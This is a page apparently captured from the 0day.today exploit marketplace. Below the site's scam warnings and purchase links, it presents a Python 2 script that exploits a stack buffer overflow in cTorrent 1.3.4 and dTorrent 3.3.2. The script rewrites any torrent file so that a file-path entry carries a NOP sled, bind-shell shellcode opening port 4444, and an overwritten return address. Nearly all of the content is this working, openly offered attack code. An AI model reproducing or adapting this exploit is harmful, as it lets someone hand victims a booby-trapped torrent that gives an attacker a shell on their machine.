0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
cTorrent/DTorrent (.Torrent File) Buffer Overflow Exploit
========================================================= cTorrent/DTorrent (.Torrent File) Buffer Overflow Exploit ========================================================= #!/usr/bin/python #Written By Michael Brooks #Stack Based Buffer Overflow #The vulnerability is in the btFiles::BuildFromMI function #inside the btfiles.cpp file #Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386 #Can't get the exploit working on a modern linux kernel because of ASLR #code is using python 2.5 #Home page for cTorrent 1.3.4: #http://sourceforge.net/projects/ctorrent/ 161,000+ Downloads #dTorrent 3.3.2 is also vulnerable: #http://sourceforge.net/projects/dtorrent/ 18,000+ downloads import sys import os #This code will take any torrent file and turn it into an exploit. USAGE="python exploit.py in_file.torrent out_file.torrent" def main(): #Start of the program bfile=fileio() try: bad_torrent=bfile.read_bencode(sys.argv[1]) except: print USAGE sys.exit() exploit_str=create_exploit() print("Writing Bytes:"+str(len(exploit_str))) bad_torrent["info"]["files"][0]["path"][0]=exploit_str try: bfile.write_bencode(sys.argv[2], bad_torrent) except: print USAGE sys.exit() def create_exploit(): # linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com shellcode = "\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27" shellcode += "\x1a\xbe\x4e\x83\xeb\xfc\xe2\xf4\x16\xc1\xed\x0d\x74\x70\xbc\x24" shellcode += "\x41\x42\x27\xc7\xc6\xd7\x3e\xd8\x64\x48\xd8\x26\x36\x46\xd8\x1d" shellcode += "\xae\xfb\xd4\x28\x7f\x4a\xef\x18\xae\xfb\x73\xce\x97\x7c\x6f\xad" shellcode += "\xea\x9a\xec\x1c\x71\x59\x37\xaf\x97\x7c\x73\xce\xb4\x70\xbc\x17" shellcode += "\x97\x25\x73\xce\x6e\x63\x47\xfe\x2c\x48\xd6\x61\x08\x69\xd6\x26" shellcode += "\x08\x78\xd7\x20\xae\xf9\xec\x1d\xae\xfb\x73\xce" #The exact address of our buffer is 0xbffffccc, which ebx tells us #however memeory changes before we control the eip, #so we change the addr to hit the NOP sled eip="\x11\xf1\xff\xbf" #eip="\xcc\xfc\xff\xbf"#the add ebx is holding #this is a dummy address to satisfy other pointer before we return #this cannot be the EIP becuase this location is written to! dumb_addr="\xcc\xfc\xff\xbf" #nop sled long_str="\x90"*(4028-len(shellcode)) #memory around the shellcode is written to, but this is a safe place long_str+=shellcode #this 100byte buffer is written to before we control the eip long_str+="\x90"*100 long_str+=eip#4128 bytes is the EIP! #This pointer must be real becuase it is written to in btFiles::BuildFromMI long_str+=dumb_addr#"this" #We can control these addresses but we don't need them #long_str+=dumb_addr#"metabuf" #long_str+=dumb_addr#"saveas" return long_str #Start of functions for bencoding: def BTFailure(msg): pass def decode_int(x, f): f += 1 newf = x.index('e', f) n = int(x[f:newf]) if x[f] == '-': if x[f + 1] == '0': raise ValueError elif x[f] == '0' and newf != f+1: raise ValueError return (n, newf+1) def decode_string(x, f): colon = x.index(':', f) n = int(x[f:colon]) if x[f] == '0' and colon != f+1: raise ValueError colon += 1 return (x[colon:colon+n], colon+n) def decode_list(x, f): r, f = [], f+1 while x[f] != 'e': v, f = decode_func[x[f]](x, f) r.append(v) return (r, f + 1) def decode_dict(x, f): r, f = {}, f+1 while x[f] != 'e': k, f = decode_string(x, f) r[k], f = decode_func[x[f]](x, f) return (r, f + 1) decode_func = {} decode_func['l'] = decode_list decode_func['d'] = decode_dict decode_func['i'] = decode_int decode_func['0'] = decode_string decode_func['1'] = decode_string decode_func['2'] = decode_string decode_func['3'] = decode_string decode_func['4'] = decode_string decode_func['5'] = decode_string decode_func['6'] = decode_string decode_func['7'] = decode_string decode_func['8'] = decode_string decode_func['9'] = decode_string def bdecode(x): try: r, l = decode_func[x[0]](x, 0) except (IndexError, KeyError, ValueError): raise BTFailure("not a valid bencoded string") if l != len(x): raise BTFailure("invalid bencoded value (data after valid prefix)") return r from types import StringType, IntType, LongType, DictType, ListType, TupleType class Bencached(object): __slots__ = ['bencoded'] def __init__(self, s): self.bencoded = s def encode_bencached(x,r): r.append(x.bencoded) def encode_int(x, r): r.extend(('i', str(x), 'e')) def encode_bool(x, r): if x: encode_int(1, r) else: encode_int(0, r) def encode_string(x, r): r.extend((str(len(x)), ':', x)) def encode_list(x, r): r.append('l') for i in x: encode_func[type(i)](i, r) r.append('e') def encode_dict(x,r): r.append('d') ilist = x.items() ilist.sort() for k, v in ilist: r.extend((str(len(k)), ':', k)) encode_func[type(v)](v, r) r.append('e') encode_func = {} encode_func[Bencached] = encode_bencached encode_func[IntType] = encode_int encode_func[LongType] = encode_int encode_func[StringType] = encode_string encode_func[ListType] = encode_list encode_func[TupleType] = encode_list encode_func[DictType] = encode_dict try: from types import BooleanType encode_func[BooleanType] = encode_bool except ImportError: pass def bencode(x): r = [] encode_func[type(x)](x, r) return ''.join(r) class fileio: def read_bencode(self,file): infile = open(file,"r") file=infile.read() infile.close return bdecode(file) #writes a dictionary to a bencoded file def write_bencode(self,file,dict): outfile = open(file, 'wb') outfile.write(bencode(dict)) outfile.close() #execute main main() # 0day.today [2024-12-25] #